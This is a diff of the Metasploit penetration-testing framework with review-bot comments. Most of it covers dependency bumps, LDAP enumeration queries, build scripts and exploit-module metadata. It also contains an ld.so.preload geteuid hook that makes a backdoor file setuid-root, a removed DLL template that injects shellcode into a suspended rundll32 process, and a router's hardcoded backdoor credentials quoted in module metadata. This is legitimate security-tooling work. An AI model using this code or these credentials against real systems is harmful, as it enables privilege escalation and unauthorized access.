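Review bot: `bindata` moves from `2.4.14, ruby` to `2.4.15, "Simplified BSD"`, which is a license-string change riding on a patch-level bump while every other line in this hunk is a version-only change; since the header says the file is generated by tools/dev/update_gem_licenses.sh, that should reflect the gem's own metadata, but it is worth confirming rather than assuming before merging.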
@@ -41,8 +41,8 @@ erubi, 1.12.0, MIT
eventmachine, 1.2.7, "ruby, GPL-2.0"
factory_bot, 6.2.1, MIT
factory_bot_rails, 6.2.0, MIT
faker, 3.1.0, MIT
faraday, 2.7.2, MIT
faker, 3.1.1, MIT
faraday, 2.7.4, MIT
faraday-net_http, 3.0.2, MIT
faraday-retry, 2.0.0, MIT
faye-websocket, 0.11.1, "Apache 2.0"
@@ -68,12 +68,12 @@ logging, 2.3.1, MIT
loofah, 2.19.1, MIT
memory_profiler, 1.0.1, MIT
metasm, 1.0.5, LGPL-2.1
metasploit-concern, 4.0.5, "New BSD"
metasploit-credential, 6.0.1, "New BSD"
metasploit-framework, 6.2.36, "New BSD"
metasploit-model, 4.0.6, "New BSD"
metasploit-payloads, 2.0.105, "3-clause (or ""modified"") BSD"
metasploit_data_models, 5.0.6, "New BSD"
metasploit-concern, 5.0.1, "New BSD"
metasploit-credential, 6.0.2, "New BSD"
metasploit-framework, 6.3.3, "New BSD"
metasploit-model, 5.0.1, "New BSD"
metasploit-payloads, 2.0.108, "3-clause (or ""modified"") BSD"
metasploit_data_models, 6.0.2, "New BSD"
metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
method_source, 1.0.0, MIT
mini_portile2, 2.8.1, MIT
@@ -90,7 +90,7 @@ net-ssh, 7.0.1, MIT
network_interface, 0.0.2, MIT
nexpose, 7.3.0, "New BSD"
nio4r, 2.5.8, MIT
nokogiri, 1.13.10, MIT
nokogiri, 1.14.1, MIT
nori, 2.6.0, MIT
octokit, 4.25.1, MIT
openssl-ccm, 1.2.3, MIT
@@ -108,54 +108,55 @@ pry-byebug, 3.10.1, MIT
public_suffix, 5.0.1, MIT
puma, 6.0.2, "New BSD"
racc, 1.6.2, "ruby, Simplified BSD"
rack, 2.2.5, MIT
rack, 2.2.6.2, MIT
rack-protection, 3.0.5, MIT
rack-test, 2.0.2, MIT
rails-dom-testing, 2.0.3, MIT
rails-html-sanitizer, 1.4.4, MIT
railties, 6.1.7, MIT
rails-html-sanitizer, 1.5.0, MIT
railties, 7.0.4.2, MIT
rainbow, 3.1.1, MIT
rake, 13.0.6, MIT
rasn1, 0.12.1, MIT
rb-readline, 0.5.5, BSD
recog, 3.0.3, unknown
redcarpet, 3.5.1, MIT
regexp_parser, 2.6.1, MIT
redcarpet, 3.6.0, MIT
regexp_parser, 2.6.2, MIT
reline, 0.3.2, ruby
rex-arch, 0.1.14, "New BSD"
rex-bin_tools, 0.1.8, "New BSD"
rex-core, 0.1.28, "New BSD"
rex-core, 0.1.30, "New BSD"
rex-encoder, 0.1.6, "New BSD"
rex-exploitation, 0.1.36, "New BSD"
rex-exploitation, 0.1.37, "New BSD"
rex-java, 0.1.6, "New BSD"
rex-mime, 0.1.7, "New BSD"
rex-nop, 0.1.2, "New BSD"
rex-ole, 0.1.7, "New BSD"
rex-powershell, 0.1.97, "New BSD"
rex-random_identifier, 0.1.9, "New BSD"
rex-random_identifier, 0.1.10, "New BSD"
rex-registry, 0.1.4, "New BSD"
rex-rop_builder, 0.1.4, "New BSD"
rex-socket, 0.1.43, "New BSD"
rex-sslscan, 0.1.8, "New BSD"
rex-socket, 0.1.47, "New BSD"
rex-sslscan, 0.1.9, "New BSD"
rex-struct2, 0.1.3, "New BSD"
rex-text, 0.2.47, "New BSD"
rex-text, 0.2.49, "New BSD"
rex-zip, 0.1.4, "New BSD"
rexml, 3.2.5, "Simplified BSD"
rkelly-remix, 0.0.7, MIT
rspec, 3.12.0, MIT
rspec-core, 3.12.0, MIT
rspec-core, 3.12.1, MIT
rspec-expectations, 3.12.2, MIT
rspec-mocks, 3.12.2, MIT
rspec-mocks, 3.12.3, MIT
rspec-rails, 6.0.1, MIT
rspec-rerun, 1.1.0, MIT
rspec-support, 3.12.0, MIT
rubocop, 1.42.0, MIT
rubocop, 1.44.1, MIT
rubocop-ast, 1.24.1, MIT
ruby-macho, 3.0.0, MIT
ruby-prof, 1.4.2, "Simplified BSD"
ruby-progressbar, 1.11.0, MIT
ruby-rc4, 0.1.5, MIT
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
ruby_smb, 3.2.1, "New BSD"
ruby_smb, 3.2.4, "New BSD"
rubyntlm, 0.6.3, MIT
rubyzip, 2.3.2, "Simplified BSD"
sawyer, 0.9.2, MIT
@@ -163,8 +164,9 @@ simplecov, 0.18.2, MIT
simplecov-html, 0.12.3, MIT
simpleidn, 0.2.1, MIT
sinatra, 3.0.5, MIT
sqlite3, 1.5.4, "New BSD"
sqlite3, 1.6.0, "New BSD"
sshkey, 2.0.0, MIT
strptime, 0.2.5, "Simplified BSD"
swagger-blocks, 3.0.0, MIT
thin, 1.8.1, "GPL-2.0+, ruby"
thor, 1.2.1, MIT
@@ -172,7 +174,7 @@ tilt, 2.0.11, MIT
timecop, 0.9.6, MIT
timeout, 0.3.1, "ruby, Simplified BSD"
ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
tzinfo, 2.0.5, MIT
tzinfo, 2.0.6, MIT
tzinfo-data, 1.2022.7, MIT
unf, 0.1.4, "2-clause BSDL"
unf_ext, 0.0.8.2, MIT
@@ -183,7 +185,7 @@ webrick, 1.7.0, "ruby, Simplified BSD"
websocket-driver, 0.7.5, "Apache 2.0"
websocket-extensions, 0.1.5, "Apache 2.0"
win32api, 0.1.0, unknown
windows_error, 0.1.4, BSD
windows_error, 0.1.5, BSD
winrm, 2.3.6, "Apache 2.0"
xdr, 3.0.3, "Apache 2.0"
xmlrpc, 0.3.2, "ruby, Simplified BSD"
+4
@@ -49,6 +49,10 @@ module Metasploit
when "production"
config.eager_load = true
end
if ActiveRecord.respond_to?(:legacy_connection_handling=)
ActiveRecord.legacy_connection_handling = false
end
end
end
end
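Review bot: The `ActiveRecord.respond_to?(:legacy_connection_handling=)` guard carries no comment saying why the assignment is conditional; add one line noting that the setter only exists on some ActiveRecord versions, otherwise a later cleanup is likely to drop the check as dead code and break boot on a version without it.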
@@ -9,6 +9,7 @@ queries:
- description
- displayName
- sAMAccountName
- objectSID
- userPrincipalName
- userAccountControl
- homeDirectory
@@ -92,12 +93,14 @@ queries:
filter: '(|(objectCategory=computer)(objectClass=computer))'
attributes:
- dn
- name
- description
- displayName
- sAMAccountName
- objectSID
- distinguishedName
- dNSHostName
- description
- givenName
- name
- operatingSystem
- operatingSystemVersion
- operatingSystemServicePack
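Review bot: In the computer-object attribute list `description` now appears twice (once after `displayName`, once after `dNSHostName`), and `givenName` is a user attribute that computer objects do not normally carry; drop the duplicate and check whether `givenName` was pasted in from the user query by mistake.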
@@ -140,6 +143,18 @@ queries:
- distinguishedName
references:
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
- action: ENUM_DOMAIN
description: 'Dump info about the Active Directory domain.'
filter: '(objectClass=domain)'
attributes:
- ms-DS-MachineAccountQuota
- objectSID
- name
- lockoutduration
- lockoutthreshold
- minpwdage
- maxpwdage
- minpwdlength
- action: ENUM_DOMAIN_CONTROLLERS
description: 'Dump all known domain controllers.'
filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
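Review bot: ENUM_DOMAIN is the only new action in this file without a `references:` entry, and its description ('Dump info about the Active Directory domain.') does not say that it returns the lockout and password policy values (`lockoutduration`, `lockoutthreshold`, `minpwdage`, `maxpwdage`, `minpwdlength`); make the description mention those attributes so users know what the action actually reports, and add a reference for where the attribute names come from.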
@@ -253,6 +268,13 @@ queries:
- dnsHostName
references:
- https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
- action: ENUM_MACHINE_ACCOUNT_QUOTA
description: 'Dump the number of computer accounts a user is allowed to create in a domain.'
filter: '(objectClass=domain)'
attributes:
- ms-DS-MachineAccountQuota
references:
- https://learn.microsoft.com/en-us/windows/win32/adschema/a-ms-ds-machineaccountquota
- action: ENUM_ORGROLES
description: 'Dump info about all known organization roles in the LDAP environment.'
filter: '(objectClass=organizationalRole)'
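Review bot: ENUM_MACHINE_ACCOUNT_QUOTA duplicates what the new ENUM_DOMAIN action already returns (`ms-DS-MachineAccountQuota` under the same `(objectClass=domain)` filter); either state in its description that it is a single-attribute convenience over ENUM_DOMAIN, or fold it into ENUM_DOMAIN so the two actions cannot drift apart.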
@@ -0,0 +1,15 @@
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
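Review bot: The side effects of this hook are not documented in the hunk: when the hooked process runs as root it leaves a root-owned mode 04777 file at the substituted `$BACKDOORPATH` and deletes `/etc/ld.so.preload`, so the module that installs it should list both in its side-effect notes and cleanup steps so the artifacts can be reverted after an engagement. Also, `$BACKDOORPATH` is a shell-style placeholder inside a C string literal, so this file is a template that must be substituted before it is compiled; a one-line comment saying so would spare the next reader a puzzle.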
Binary file not shown.
+2 -2
@@ -15,7 +15,7 @@
<% end %>
## Module Ranking
<%# https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking %>
<%# https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html %>
**<%= items[:mod_rank_name] %>**
@@ -47,7 +47,7 @@
<% end %>
## Module Traits
<%# https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability %>
<%# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html %>
<% unless items[:mod_side_effects].empty? %>
### Side Effects
+1 -1
@@ -5,4 +5,4 @@ msf <%= mod.type %>(<%= mod.shortname %>) > show options
msf <%= mod.type %>(<%= mod.shortname %>) > generate
```
To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom).
To learn how to generate <%= mod.fullname %> with msfvenom, please [read this](https://docs.metasploit.com/docs/using-metasploit/basics/how-to-use-msfvenom.html).
+10
@@ -0,0 +1,10 @@
# PE Source Code
This directory contains the source code for the PE executable templates.
## Building DLLs
Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
developer console. The batch file requires that the `%VCINSTALLDIR%` environment
variable be defined (which it should be by default). The build script will
create both the x86 and x64 templates before moving them into the correct
folder. The current working directory when the build is run must be the source
code directory (`pe`).
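Review bot: The README does not mention that each build also emits a 256 KiB variant (the `/DSCSIZE=262144` builds named `template_<arch>_windows.256kib.dll`), nor that `rc` is needed for the version resource; add a sentence listing the expected output files so a developer can tell a partial build from a complete one.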
+7
@@ -0,0 +1,7 @@
@echo off
for /D %%d in (dll*) do (
pushd "%%d"
build.bat
popd
)
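Review bot: `build.bat` is invoked without `call` inside the `for /D` loop; in cmd, running a batch file that way transfers control and does not return to the caller, so only the first `dll*` directory is built and the `popd` never runs. Use `call build.bat` instead.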
+4 -3
@@ -3,12 +3,13 @@
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib /entry:DllMain /subsystem:WINDOWS
rc /v template.rc
cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj
del *.obj *.res
move *.dll ..\..\..
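Review bot: Neither the `rc /v template.rc` step nor the two `cl` invocations check the exit status, so a failed resource compile or a failed 4 KiB build still falls through to the 256 KiB build and then to `del *.obj *.res` / `move *.dll ..\..\..`, silently shipping whichever DLLs happened to build; add `if errorlevel 1 exit /B 1` after each step.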
+2 -1
@@ -1,5 +1,6 @@
#ifndef SCSIZE
#define SCSIZE 4096
#endif
unsigned char code[SCSIZE] = "PAYLOAD:";
char szSyncNameS[MAX_PATH] = "Local\\Semaphore:Default\0";
char szSyncNameE[MAX_PATH] = "Local\\Event:Default\0";
@@ -0,0 +1,15 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rc /v /fo template.res ../dll/template.rc
cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.exp *.lib *.res *.obj
move *.dll ..\..\..
@@ -1,24 +0,0 @@
#
# XXX: NOTE: this will only compile the x86 version.
#
# To compile the x64 version, use:
# C:\> call "c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\vcvarsall.bat" amd64
# C:\> cl.exe -LD /Zl /GS- /DBUILDMODE=2 /link /entry:DllMain kernel32.lib
#
if [ -z "$PREFIX" ]; then
PREFIX=i686-w64-mingw32
fi
rm -f *.o *.dll
$PREFIX-gcc -c template.c
$PREFIX-windres -o rc.o template.rc
$PREFIX-gcc -mdll -o junk.tmp -Wl,--base-file,base.tmp template.o rc.o
rm -f junk.tmp
$PREFIX-dlltool --dllname template_x86_windows.dll --base-file base.tmp --output-exp temp.exp #--def template.def
rm -f base.tmp
$PREFIX-gcc -mdll -o template_x86_windows.dll template.o rc.o -Wl,temp.exp
rm -f temp.exp
$PREFIX-strip template_x86_windows.dll
rm -f *.o
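Review bot: Deleting this script removes the only mingw (non-Visual Studio) build path for the x86 DLL template; if that is intended, say so in the commit message and have the README state that the templates can only be rebuilt with MSVC, otherwise keep an updated build.sh that also produces the `.256kib` variant.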
@@ -1,6 +1,3 @@
#define SCSIZE 2048
unsigned char code[SCSIZE] = "PAYLOAD:";
#ifdef _MSC_VER
#pragma comment (linker, "/export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc,@34")
#pragma comment (linker, "/export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush,@46")
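Review bot: Dropping `#define SCSIZE 2048` here means the dccw_gdiplus template now inherits the 4096-byte default from template.h (via `/FI exports.h` and `../dll/template.c`), so its payload capacity doubles relative to the previous build; confirm that whatever consumes the `PAYLOAD:` marker tolerates the larger region, and note the size change in the commit message.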
@@ -1,97 +0,0 @@
#include <windows.h>
#include "template.h"
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
void ExecutePayload(void);
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
// Code to run when the DLL is freed
break;
case DLL_THREAD_ATTACH:
// Code to run when a thread is created during the DLL's lifetime
break;
case DLL_THREAD_DETACH:
// Code to run when a thread ends normally.
break;
}
return TRUE;
}
void ExecutePayload(void) {
int error;
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
DWORD prot;
LPVOID ep;
// Start up the payload in a new process
inline_bzero( &si, sizeof( si ));
si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread,&ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
// ExitProcess(0);
ExitThread(0);
}
/*
typedef VOID
(NTAPI *PIMAGE_TLS_CALLBACK) (
PVOID DllHandle,
ULONG Reason,
PVOID Reserved
);
VOID NTAPI TlsCallback(
IN PVOID DllHandle,
IN ULONG Reason,
IN PVOID Reserved)
{
__asm ( "int3" );
}
ULONG _tls_index;
PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
*/
@@ -1,3 +0,0 @@
EXPORTS
DllMain@12
@@ -1,18 +0,0 @@
LANGUAGE 9, 1
VS_VERSION_INFO VERSIONINFO
FILEVERSION 0,0,0,1
PRODUCTVERSION 0,0,0,1
FILEFLAGSMASK 0x17L
FILEFLAGS 0x0L
FILEOS 0x4L
FILETYPE 0x2L
FILESUBTYPE 0x0L
BEGIN
END
#define RT_HTML 23
@@ -4,6 +4,7 @@ if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
+3296 -677
@@ -595,9 +595,9 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/dcerpc/icpr_cert": {
"name": "ICPR Certificate Management",
"fullname": "auxiliary/admin/dcerpc/icpr_cert",
"auxiliary_admin/dcerpc/cve_2022_26923_certifried": {
"name": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)",
"fullname": "auxiliary/admin/dcerpc/cve_2022_26923_certifried",
"aliases": [
],
@@ -606,11 +606,15 @@
"type": "auxiliary",
"author": [
"Oliver Lyak",
"Spencer McIntyre"
"CravateRouge",
"Erik Wynter",
"Christophe De La Fuente"
],
"description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.",
"description": "This module exploits a privilege escalation vulnerability in Active\n Directory Certificate Services (ADCS) to generate a valid certificate\n impersonating the Domain Controller (DC) computer account. This\n certificate is then used to authenticate to the target as the DC\n account using PKINIT preauthentication mechanism. The module will get\n and cache the Ticket-Granting-Ticket (TGT) for this account along\n with its NTLM hash. Finally, it requests a TGS impersonating a\n privileged user (Administrator by default). This TGS can then be used\n by other modules or external tools.",
"references": [
"URL-https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4",
"URL-https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html",
"CVE-2022-26923"
],
"platform": "",
"arch": "",
@@ -624,7 +628,63 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2022-08-25 08:49:52 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/cve_2022_26923_certifried",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"Certifried"
],
"Reliability": [
"crash-safe"
],
"Stability": [
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/dcerpc/icpr_cert": {
"name": "ICPR Certificate Management",
"fullname": "auxiliary/admin/dcerpc/icpr_cert",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Will Schroeder",
"Lee Christensen",
"Oliver Lyak",
"Spencer McIntyre"
],
"description": "Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate\n template's configuration the resulting certificate can be used for various operations such as authentication.\n PFX certificate files that are saved are encrypted with a blank password.",
"references": [
"URL-https://github.com/GhostPack/Certify",
"URL-https://github.com/ly4k/Certipy"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2022-12-02 16:29:02 +0000",
"path": "/modules/auxiliary/admin/dcerpc/icpr_cert.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/icpr_cert",
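Review bot: in the new `cve_2022_26923_certifried` entry the tag is filed under the wrong note: `"Reliability": [ "crash-safe" ]` with `"Stability": [ ]` empty, whereas the `ibm_drm_download` entry further down this same file carries `crash-safe` under `Stability` and leaves `Reliability` empty, which is the usual placement. Because this JSON is regenerated from module metadata, the fix belongs in the module's Notes hash rather than in this file. The entry also records `"check": false`; a check method for a privilege-escalation module that already authenticates to the target would be a reasonable follow-up, but not a blocker here.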
@@ -640,6 +700,10 @@
],
"SideEffects": [
"ioc-in-logs"
],
"AKA": [
"Certifry",
"Certipy"
]
},
"session_types": false,
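Review bot: `"Certifry"` in the new AKA list looks like a typo for `Certify`, the GhostPack tool this same entry already references by URL (`URL-https://github.com/GhostPack/Certify`); AKA values are what module search matches on, so a search for the intended spelling would not find this module. As with the entry above, correct it in the module's Notes, since this file is regenerated from module metadata.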
@@ -674,7 +738,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2022-10-21 13:40:38 +0000",
"mod_time": "2022-12-02 16:29:02 +0000",
"path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
"is_install_path": true,
"ref_name": "admin/dcerpc/samr_computer",
@@ -1117,7 +1181,7 @@
"Jan Trencansky <jan.trencansky@gmail.com>",
"Lior Oppenheim"
],
"description": "This module exploits HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.",
"description": "This module exploits HTTP servers that appear to be vulnerable to the\n 'Misfortune Cookie' vulnerability which affects Allegro Software\n Rompager versions before 4.34 and can allow attackers to authenticate\n to the HTTP service as an administrator without providing valid\n credentials.",
"references": [
"CVE-2014-9222",
"URL-https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/",
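Review bot: the removed and added `description` lines in this hunk are identical as rendered, so the only difference is whitespace (most likely the indentation embedded after each `\n` in the module's heredoc), yet `mod_time` moves from 2022-01-23 to 2023-02-08; the same pattern repeats for every `admin/http` entry that follows. That is the expected result of a formatting sweep on the module files, but readers of this file should not take the new `mod_time` values as evidence of a functional change to those modules.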
@@ -1143,7 +1207,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb",
"is_install_path": true,
"ref_name": "admin/http/allegro_rompager_auth_bypass",
@@ -1167,7 +1231,7 @@
"author": [
"joev <joev@metasploit.com>"
],
"description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n several vulnerabilities that, when combined, allow an arbitrary website to take\n control of the modem, even if the user is not currently logged in. The attacker\n must successfully know, or guess, the target's internal gateway IP address.\n This is usually a default value of 192.168.0.1.\n\n First, a hardcoded backdoor account was discovered in the source code\n of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n in the device's login form, these credentials - along with the default\n \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n inadvertently logging the user into the router.\n\n Once successfully logged in, a persistent XSS vulnerability is\n exploited in the firewall configuration page. This allows injection of\n Javascript that can perform any available action in the router interface.\n\n The following firmware versions have been tested as vulnerable:\n\n SBG6580-6.5.2.0-GA-06-077-NOSH, and\n SBG6580-8.6.1.0-GA-04-098-NOSH",
"description": "The web interface for the Arris / Motorola Surfboard SBG6580 has\n several vulnerabilities that, when combined, allow an arbitrary website to take\n control of the modem, even if the user is not currently logged in. The attacker\n must successfully know, or guess, the target's internal gateway IP address.\n This is usually a default value of 192.168.0.1.\n\n First, a hardcoded backdoor account was discovered in the source code\n of one device with the credentials \"technician/yZgO8Bvj\". Due to lack of CSRF\n in the device's login form, these credentials - along with the default\n \"admin/motorola\" - can be sent to the device by an arbitrary website, thus\n inadvertently logging the user into the router.\n\n Once successfully logged in, a persistent XSS vulnerability is\n exploited in the firewall configuration page. This allows injection of\n Javascript that can perform any available action in the router interface.\n\n The following firmware versions have been tested as vulnerable:\n\n SBG6580-6.5.2.0-GA-06-077-NOSH, and\n SBG6580-8.6.1.0-GA-04-098-NOSH",
"references": [
"CVE-2015-0964",
"CVE-2015-0965",
@@ -1184,7 +1248,7 @@
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
"is_install_path": true,
"ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -1209,7 +1273,7 @@
"Zhao Liang",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in the WebAdmin\n interface of Axigen, which allows an authenticated user to read and delete\n arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n Windows platforms. This module has been tested successfully on Axigen 8.10 over\n Windows 2003 SP2.",
"description": "This module exploits a directory traversal vulnerability in the WebAdmin\n interface of Axigen, which allows an authenticated user to read and delete\n arbitrary files with SYSTEM privileges. The vulnerability is known to work on\n Windows platforms. This module has been tested successfully on Axigen 8.10 over\n Windows 2003 SP2.",
"references": [
"US-CERT-VU-586556",
"CVE-2012-4940",
@@ -1234,7 +1298,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/axigen_file_access.rb",
"is_install_path": true,
"ref_name": "admin/http/axigen_file_access",
@@ -1283,7 +1347,7 @@
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/cfme_manageiq_evm_pass_reset",
@@ -1346,7 +1410,7 @@
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n 4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n accessible via a specific url, to any authenticated user. The module uses this\n shell to execute arbitrary system commands as 'root'.",
"description": "Cambium cnPilot r200/r201 device software versions 4.2.3-R4 to\n 4.3.3-R4, contain an undocumented, backdoor 'root' shell. This shell is\n accessible via a specific url, to any authenticated user. The module uses this\n shell to execute arbitrary system commands as 'root'.",
"references": [
"CVE-2017-5259",
"URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/"
@@ -1370,7 +1434,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb",
"is_install_path": true,
"ref_name": "admin/http/cnpilot_r_cmd_exec",
@@ -1394,7 +1458,7 @@
"author": [
"Karn Ganeshen <KarnGaneshen@gmail.com>"
],
"description": "This module exploits a File Path Traversal vulnerability in Cambium\n cnPilot r200/r201 to read arbitrary files off the file system. Affected\n versions - 4.3.3-R4 and prior.",
"description": "This module exploits a File Path Traversal vulnerability in Cambium\n cnPilot r200/r201 to read arbitrary files off the file system. Affected\n versions - 4.3.3-R4 and prior.",
"references": [
"CVE-2017-5261",
"URL-https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/"
@@ -1418,7 +1482,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/cnpilot_r_fpt.rb",
"is_install_path": true,
"ref_name": "admin/http/cnpilot_r_fpt",
@@ -1466,7 +1530,7 @@
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb",
"is_install_path": true,
"ref_name": "admin/http/contentkeeper_fileaccess",
@@ -1490,7 +1554,7 @@
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
